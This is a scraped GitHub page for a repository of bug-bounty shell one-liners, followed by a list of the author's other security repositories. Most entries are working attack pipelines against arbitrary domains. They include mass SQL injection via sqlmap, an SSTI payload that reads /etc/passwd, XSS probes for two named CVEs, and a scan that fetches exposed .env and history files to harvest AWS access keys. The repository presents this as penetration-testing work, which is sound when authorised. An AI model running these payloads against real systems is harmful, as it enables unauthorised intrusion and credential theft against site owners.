• Stars
    star
    114
  • Rank 308,031 (Top 7 %)
  • Language
  • Created over 3 years ago
  • Updated about 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A collection oneliner scripts for bug bounty

Oneliner-Bugbounty

A collection oneliner scripts for bug bounty

List tools

Auto scanner

subfinder -d site.com -all | naabu | httpx | nuclei -t nuclei-templates

Finding files (For example in here .json file)

subfinder -d site.com -all | naabu | httpx | waybackurls | grep -E ".json(?:onp?)?$"

Find interesting subdomain (For example like admin.staging.example.com)

subfinder -d site.com -all | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'dmz\|api\|staging\|env\|v1\|stag\|prod\|dev\|stg\|test\|demo\|pre\|admin\|beta\|vpn\|cdn\|coll\|sandbox\|qa\|intra\|extra\|s3\|external\|back'

Find SQL injection at scale

subfinder -d site.com -all -silent | waybackurls | sort -u | gf sqli > gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli.txt

Find open redirects at scale

subfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsreplace 'https://example.com' | httpx -fr -title --match-string 'Example Domain'

Find SSTI at scale

echo "domain" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep  "root:x"

Scanning top exploited vulnerabilities according to CISA

subfinder -d site.com -all -silent | httpx -silent | nuclei -rl 50 -c 15 -timeout 10 -tags cisa -vv

Bruteforce subdomains

subfinder -d site.com -all -silent | httpx -silent | hakrawler | tr "[:punct:]" "\n" | sort -u > wordlist.txt

puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt

Finding Cross-Site Scripting (XSS) using KnoXSS API

echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh

CVE-2021-31589

cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done

CVE-2023-29489

subfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaa' -mc 400

Clean list of host, port, and version

mkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1; cd nmap; grep -Hari "/tcp" | tee -a ../services.txt; cd ../

Waybackurls validator

waybackurls http://example.com | grep "url" | xargs -n 1 curl -s -o /dev/null -w "%{http_code} > %{url_effective}\n" | sort

Extract endpoints from JS (Part 1)

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

Extract endpoints from JS (Part 2)

curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"

Extract endpoints from JS (Part 3)

curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\";curl -Lks \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""

Extract endpoints from JS (Part 4)

curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""

Find Access Keys for IAM

echo example.com | subfinder -silent -all | httpx -silent -path ".env",".mysql_history","echo $(echo $(</dev/stdin) | cut -d "." -f2).sql" -mc 200 -ports 80,443,8080,8443 | grep -E -i "AKIA[A-Z0-9]{16}"

Subdomain enumeration with Spyse API

curl -XGET "https://api.sypse.com/v3/data/domain/subdomain?limit=100&offset=100&domain=example.com" -H "Accept: application/json" -H "Authorization: Bearer TOKEN_HERE" 2>/dev/null | jq '.data.items | .[] | .name' | sed -e 's/^"//' -e 's/"$//' | grep example.com

References

More Repositories

1

AllAboutBugBounty

All about bug bounty (bypasses, payloads, and etc)
5,029
star
2

match-replace-burp

Useful "Match and Replace" burpsuite rules
265
star
3

all-about-apikey

Detailed information about API key / OAuth token (Description, Request, Response, Regex, Example)
234
star
4

Key-Checker

Go scripts for checking API key / access token validity
Go
207
star
5

Git-Secret

Go scripts for finding sensitive data like API key / some keywords in the github repository
Go
158
star
6

bash-bounty

Random Tools for Bug Bounty
Shell
134
star
7

bypass-403

Go script for bypassing 403 forbidden
Go
122
star
8

ctf-writeup

CTF Writeups
Python
106
star
9

my-nuclei-templates

Some contributions in the nuclei-templates repository
53
star
10

apiguesser-web

Simple website to guess API Key / OAuth Token
JavaScript
47
star
11

apiguesser

Go script to guess an API key / OAuth token found during pentest. CLI version of https://github.com/daffainfo/apiguesser-web/
Go
43
star
12

suricata-rules

Suricata rules that can detect a wide range of threats, including malware, exploits, and other malicious activity especially web application attacks
Python
22
star
13

vulnerable-web

Simple vulnerability labs that created using PHP and MySQL.
PHP
14
star
14

jawaban-toki

Jawaban pemrograman C dan C++ https://tlx.toki.id/
C++
12
star
15

vulnlabs

A simple vulnerable webapp created by PHP
CSS
12
star
16

nuclei-malware

Template to detect some malware
12
star
17

dns-lookup

DNS lookup using Go
Go
11
star
18

malpacks

Tools for Detecting Malicious Packages
Python
10
star
19

BugBountyTools-PHP

Bug bounty tools built in PHP to help penetration tester doing the job
PHP
7
star
20

mailspoof

Simple API to scans SPF, DMARC, DKIM records for issues that could allow email spoofing.
PHP
5
star
21

simple-php-captcha

Simple captcha dengan menggunakan PHP
PHP
4
star
22

complete-php-crud

PHP CRUD + Login and Register
PHP
4
star
23

OSINT

Checking social media accounts using username
Shell
4
star
24

daffainfo

My profile
4
star
25

notifier

Golang tool to send notifications to LINE app
Go
3
star
26

openxpki-installer

Simple bash script to install OpenXPKI on Debian
Shell
2
star
27

daffa.info

Personal website and blog made using Hugo and PaperMod theme
HTML
2
star
28

Coronavirus-Tracking-Web

Website info-corona.id
HTML
2
star
29

budgetku

Final Project for Mobile Device Programming Course
Java
2
star
30

daffainfo.github.io

Simple CV using HTML and CSS
HTML
1
star
31

pweb-3

Repository untuk mata kuliah pemrograman web
HTML
1
star
32

Info-Webinar

Webinar source code
HTML
1
star
33

Voelas-WordPress

Wordpress Themes Voelas
PHP
1
star
34

CVE

My CVE Publications
1
star